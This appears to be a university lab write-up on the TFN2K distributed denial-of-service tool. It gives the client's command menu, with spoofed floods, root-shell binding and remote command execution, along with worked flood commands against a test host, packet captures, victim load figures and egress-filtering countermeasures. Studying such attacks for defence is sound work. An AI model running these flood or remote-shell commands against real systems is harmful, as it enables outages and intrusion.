Contents ======== - The TNF2K attack model - The Attack Command menu of the client tfn: - The Attack Examples ICMP flood attack MIX Attack using TCP, UTP and ICMP snoop data at victim Victim loading - Counter Measures - References The TNF2K attack model ====================== The client program tfn running on the Client sending commands to its server nodes which are running a server prgrom td. The ccommunication between the client and server nodes are encrypted with CAST 256 alorgthim (key length from 128 to 256). The communication packets are using random sourc IP via TCP , UDP and ICMP protocol. Hence, the communication is one way from client to server nodes. Once the server nodes recieve the commands from thier client, they commence the flood attack. TNF2K proives the following attacks: UDP flood, usage: -i victim@victim2@victim3@... TCP/SYN flood, usage: -i victim@... [-p destination port] ICMP/PING flood, usage: -i victim@... ICMP/SMURF flood, usage: -i victim@broadcast@broadcast2@... MIX flood (UDP/TCP/ICMP interchanged), usage: -i victim@... TARGA3 flood (IP stack penetration), usage: -i victim@.. The attack packets to the victim are also using random source IP. Hence, it is difficult to trace the originity of the attack even sniffering the attack packages. *----------* | | | Attacker | | | *----------* | | *----------* | | | Client | | | *----------* | (commands to nodes) | *------------*------*------*------------* | | | | | | | | v v v v *----------* *----------* *----------* *----------* | | | | | | | | | Node | | Node | | Node | | Node | | | | | | | | | *----------* *----------* *----------* *----------* \ \ / / \ \ / / \ \ / / (any number of floods or attacks) \ \ / / \ \ / / \ \ / / V V V *-----------------------* | | | Victim | | | *-----------------------* The Command menu of the client tfn: ===================================== root@iegatea0 tfn2k]# ./tfn usage: ./tfn [-P protocol] Protocol for server communication. Can be ICMP, UDP or TCP. Uses a random protocol as default [-D n] Send out n bogus requests for each real one to decoy targets [-S host/ip] Specify your source IP. Randomly spoofed by default, you need to use your real IP if you are behind spoof-filtering routers [-f hostlist] Filename containing a list of hosts with TFN servers to contact [-h hostname] To contact only a single host running a TFN server [-i target string] Contains options/targets separated by '@', see below [-p port] A TCP destination port can be specified for SYN floods <-c command ID> 0 - Halt all current floods on server(s) immediately 1 - Change IP antispoof-level (evade rfc2267 filtering) usage: -i 0 (fully spoofed) to -i 3 (/24 host bytes spoofed) 2 - Change Packet size, usage: -i 3 - Bind root shell to a port, usage: -i 4 - UDP flood, usage: -i victim@victim2@victim3@... 5 - TCP/SYN flood, usage: -i victim@... [-p destination port] 6 - ICMP/PING flood, usage: -i victim@... 7 - ICMP/SMURF flood, usage: -i victim@broadcast@broadcast2@... 8 - MIX flood (UDP/TCP/ICMP interchanged), usage: -i victim@... 9 - TARGA3 flood (IP stack penetration), usage: -i victim@... 10 - Blindly execute remote shell command, usage -i command The communication packtets between the client and server nodes are using random source IP. [root@iegatea0 ~]# tcpdump host ntec1 10:25:29.858622 eth0 > 53.165.192.0.22668 > 137.189.99.81.64952: S 0:47(47) win 5093 10:25:29.879226 eth0 > 53.165.192.0.6798 > 137.189.99.81.53721: udp 30 10:25:29.899051 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply 10:25:29.919050 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply 10:25:29.939055 eth0 > 53.165.192.0.17166 > 137.189.99.81.16226: udp 30 10:25:29.959076 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply 10:25:29.979260 eth0 > 53.165.192.0.16704 > 137.189.99.81.40553: . 339790:339837(47) ack 0 win 0 10:25:29.999074 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply 10:25:30.019075 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply 10:25:30.039048 eth0 > 53.165.192.0.4810 > 137.189.99.81.3467: udp 30 10:25:30.059291 eth0 > 53.165.192.0.25373 > 137.189.99.81.58732: S 4707273:4707320(47) ack 11500271 win 32087 10:25:30.079044 eth0 > 53.165.192.0.46691 > 137.189.99.81.3017: udp 30 10:25:30.099208 eth0 > 53.165.192.0.50047 > 137.189.99.81.14998: . 0:47(47) ack 0 win 50064 10:25:30.119105 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply 10:25:30.139040 eth0 > 53.165.192.0.18898 > 137.189.99.81.64259: udp 30 10:25:30.159230 eth0 > 53.165.192.0.44591 > 137.189.99.81.41979: S 9902919:9902966(47) ack 0 win 55543 10:25:30.179037 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply 10:25:30.199090 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply 10:25:30.219062 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply 10:25:30.239121 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply The command messages in the communciation packets between the client and master nodes are encrypted by CAST 256. BTW, there is a signature of these packets -- 0x41 at the end of each packtes. [root@iegatea0 ~]# tcpdump -x host ntec1 Kernel filter, protocol ALL, datagram packet socket tcpdump: listening on all devices 10:25:53.368639 eth0 > 19.213.253.0 > 137.189.99.81: icmp: echo reply 4500 0037 e8a6 0000 dd01 f73a 13d5 fd00 89bd 6351 0000 a8ef 0c21 7e9d 2b54 4473 7955 6862 5463 6471 7a4b 6a72 6543 5a38 5a41 4141 4141 41 10:25:53.387922 eth0 > 19.213.253.0.58890 > 137.189.99.81.23376: udp 30 4500 0037 76a4 0000 d911 6d2d 13d5 fd00 89bd 6351 e60a 5b50 0026 f252 2b54 4473 7955 6862 5463 6471 7a4b 6a72 6543 5a38 5a41 4141 4141 41 10:25:53.407935 eth0 > 19.213.253.0 > 137.189.99.81: icmp: echo reply 4500 0037 90a4 0000 ca01 623d 13d5 fd00 89bd 6351 0000 2848 0b66 0000 2b54 4473 7955 6862 5463 6471 7a4b 6a72 6543 5a38 5a41 4141 4141 41 10:25:53.428187 eth0 > 19.213.253.0.24765 > 137.189.99.81.26175: S 11886646:11886693(47) win 23580 4500 0043 bc99 0000 d906 2737 13d5 fd00 89bd 6351 60bd 663f 00b5 6036 00dd 7e9b 0002 5c1c 302f 0000 2b54 4473 7955 6862 5463 6471 7a4b 6a72 6543 5a38 5a41 4141 4141 41 The Attack Examples: ==================== ICMP flood attack [root@iegatea0 tfn2k]# ./tfn -h ntec1 -c 6 -i 137.189.96.18@ Protocol : random Source IP : random Client input : single host Target(s) : 137.189.96.18@ Command : commence icmp echo flood The server node (ntec1 in this example) generate enormous ICMP flood to the victim with the random faked source IP. tcpdump does not show all the no. of these packets due to packets drop in the network interface but the swtich record dow the traffic. http://home.ie.cuhk.edu.hk/~shlam/dos/ntec1.gif [root@ntec1 tfn2k]# tcpdump host iest18 Kernel filter, protocol ALL, datagram packet socket tcpdump: listening on all devices 10:09:51.357753 eth0 > 30.12.188.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.358864 eth0 > 115.158.168.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.358949 eth0 > 42.57.217.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.359031 eth0 > 63.90.55.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.359113 eth0 > 83.28.81.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.359195 eth0 > 232.168.136.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.360206 eth0 > 58.77.151.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.360297 eth0 > 132.1.61.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.360380 eth0 > 182.190.60.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.360462 eth0 > 48.15.118.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.360544 eth0 > 204.59.230.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.360625 eth0 > 239.123.23.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.360707 eth0 > 109.51.39.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.360788 eth0 > 23.183.134.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.360869 eth0 > 43.158.42.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.360951 eth0 > 187.232.84.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.361032 eth0 > 218.98.7.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.361121 eth0 > 217.7.176.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.361204 eth0 > 102.143.242.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.361286 eth0 > 115.58.37.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.361368 eth0 > 12.11.168.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] MIX Attack using TCP, UTP and ICMP: =================================== [root@iegatea0 tfn2k]# ./tfn -h ntec1 -c 8 -i 137.189.96.18@ Protocol : random Source IP : random Client input : single host Target(s) : 137.189.96.18@ Command : commence mix flood [root@ntec1 tfn2k]# tcpdump host iest18 10:48:01.793914 eth0 < arp reply iest18.ie.cuhk.edu.hk is-at 8:0:20:72:a3:67 (0:d0:9:1c:53:1b) 10:48:01.860214 eth0 > 6.218.126.0.57825 > iest18.ie.cuhk.edu.hk.7711: udp 1 10:48:01.860959 eth0 > 135.34.187.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:48:01.861308 eth0 > 67.39.22.0.38313 > iest18.ie.cuhk.edu.hk.4477: S 15307942:15307962(20) win 54614 urg 1905 10:48:01.861446 eth0 > 105.39.155.0.57824 > iest18.ie.cuhk.edu.hk.7712: udp 1 10:48:01.861529 eth0 > 185.107.87.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:48:01.861872 eth0 > 167.206.213.0.61293 > iest18.ie.cuhk.edu.hk.49104: S 2119505:2119525(20) win 21335 urg 55981 10:48:01.862010 eth0 > 47.7.105.0.57823 > iest18.ie.cuhk.edu.hk.7713: udp 1 10:48:01.862091 eth0 > 152.193.101.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:48:01.862434 eth0 > 131.2.239.0.22771 > iest18.ie.cuhk.edu.hk.64830: S 7184719:7184739(20) win 18764 urg 53747 10:48:01.862572 eth0 > 37.213.104.0.57822 > iest18.ie.cuhk.edu.hk.7714: udp 1 10:48:01.862653 eth0 > 246.19.128.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:48:01.862996 eth0 > 244.167.176.0.11037 > iest18.ie.cuhk.edu.hk.65445: S 4719927:4719947(20) win 51371 urg 42965 10:48:01.863133 eth0 > 117.58.21.0.57821 > iest18.ie.cuhk.edu.hk.7715: udp 1 10:48:01.863214 eth0 > 77.244.115.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:48:01.863556 eth0 > 122.141.112.0.15097 > iest18.ie.cuhk.edu.hk.24997: S 61206:61226(20) win 469 snoop packet information at iest18 =================================== iest18:> 114 0.29517 68.235.166.0 -> iest18 length: 106 ICMP Echo request 115 0.00017 145.228.220.0 -> iest18 length: 60 TCP D=11884 S=48698 Syn Seq=15133544 Len=20 Win=23990 116 0.00015 8.100.11.0 -> iest18 length: 60 UDP D=2 S=65534 LEN=9 117 0.00037 0.96.70.0 -> iest18 length: 106 ICMP Echo request 118 0.00016 157.245.243.0 -> iest18 length: 60 TCP D=29943 S=26867 Syn Seq=16514205 Len=20 Win=31118 119 0.00015 35.119.45.0 -> iest18 length: 60 UDP D=3 S=65533 LEN=9 120 0.00036 17.39.208.0 -> iest18 length: 106 ICMP Echo request 121 0.00016 202.163.187.0 -> iest18 length: 60 TCP D=31941 S=13797 Syn Seq=4735357 Len=20 Win=26478 122 0.00016 228.207.50.0 -> iest18 length: 60 UDP D=4 S=65532 LEN=9 123 0.00036 8.155.94.0 -> iest18 length: 106 ICMP Echo request 124 0.00016 62.228.80.0 -> iest18 length: 60 TCP D=59474 S=62373 Syn Seq=914596 Len=20 Win=46767 125 0.00016 33.162.35.0 -> iest18 length: 60 UDP D=5 S=65531 LEN=9 126 0.00037 54.215.153.0 -> iest18 length: 106 ICMP Echo request 127 0.00017 124.194.56.0 -> iest18 length: 60 TCP D=43905 S=43300 Syn Seq=2801488 Len=20 Win=7339 128 0.00017 243.139.130.0 -> iest18 length: 60 UDP D=6 S=65530 LEN=9 129 0.00037 24.84.140.0 -> iest18 length: 106 ICMP Echo request 130 0.00017 101.149.180.0 -> iest18 length: 60 TCP D=52007 S=9808 Syn Seq=8685619 Len=20 Win=62874 116 0.00015 8.100.11.0 -> iest18 UDP D=2 S=65534 LEN=9 0: 0800 2072 a367 00d0 091c 531b 0800 4500 .. r.g....S...E. 16: 001d 7aa4 0000 e411 5ef8 0864 0b00 89bd ..z.....^ø.d.... 32: 6012 fffe 0002 0009 fff5 0000 0000 0000 `........õ...... 48: 0000 0000 0000 0000 0000 0000 ............ 117 0.00037 0.96.70.0 -> iest18 ICMP Echo request 0: 0800 2072 a367 00d0 091c 531b 0800 4500 .. r.g....S...E. 16: 005c 05d5 0000 0001 849d 0060 4600 89bd .\.........`F... 32: 6012 0800 f7ff 0000 0000 0000 0000 0000 `...÷........... 48: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 64: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 80: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 96: 0000 0000 0000 0000 0000 .......... 118 0.00016 157.245.243.0 -> iest18 TCP D=29943 S=26867 Syn Seq=16514205 Len=20 Win=31118 0: 0800 2072 a367 00d0 091c 531b 0800 4500 .. r.g....S...E. 16: 0028 9601 0000 cf06 db08 9df5 f300 89bd .(.........õó... 32: 6012 68f3 74f7 00fb fc9d 2265 0000 0022 `.hót÷...."e..." 48: 798e 769c e4fa 0000 0000 0000 y.v......... 119 0.00015 35.119.45.0 -> iest18 UDP D=3 S=65533 LEN=9 0: 0800 2072 a367 00d0 091c 531b 0800 4500 .. r.g....S...E. 16: 001d bcf6 0000 e511 de92 2377 2d00 89bd ...ö......#w-... 32: 6012 fffd 0003 0009 fff5 0000 0000 0000 `........õ...... 48: 0000 0000 0000 0000 0000 0000 ............ Victim loading ============== Before the attack, the CPU is over 90% idle last pid: 469; load averages: 1.41, 0.86, 0.55 10:51:10 44 processes: 42 sleeping, 1 running, 1 on cpu CPU states: 97.4% idle, 0.2% user, 2.0% kernel, 0.4% iowait, 0.0% swap Memory: 64M real, 2684K free, 328M swap free During the attack, the CPU Kernel loading shot up to 85% last pid: 469; load averages: 1.67, 0.82, 0.53 10:52:16 44 processes: 42 sleeping, 1 running, 1 on cpu CPU states: 14.4% idle, 0.2% user, 85.1% kernel, 0.4% iowait, 0.0% swap Memory: 64M real, 3316K free, 328M swap free Counter Measures ================ There is no know way to defend against TFN2K. Many experts only suggest to prevent your own network resources from being used as clients or server node of the attack. 1) Egress Filtering to Stop Spoofed IP Packets from Leaving Your Network I have done it by applying the following rule at ERG router. For IE network Extended IP access list 150 permit ip 137.189.96.0 0.0.3.255 any deny ip any any log For ERG netwrok Extended IP access list 151 permit ip 137.189.94.0 0.0.0.255 any deny ip any any log 2) Disable IP Directed Broadcast on all Systems ERG router have apply the following at each network interface. no ip directed-broadcast 3) Secure your hosts to keep away hacking in References: ============ http://packetstorm.securify.com/distributed/TFN2k_Analysis-1.3.txt http://www.sans.org/dosstep/index.htm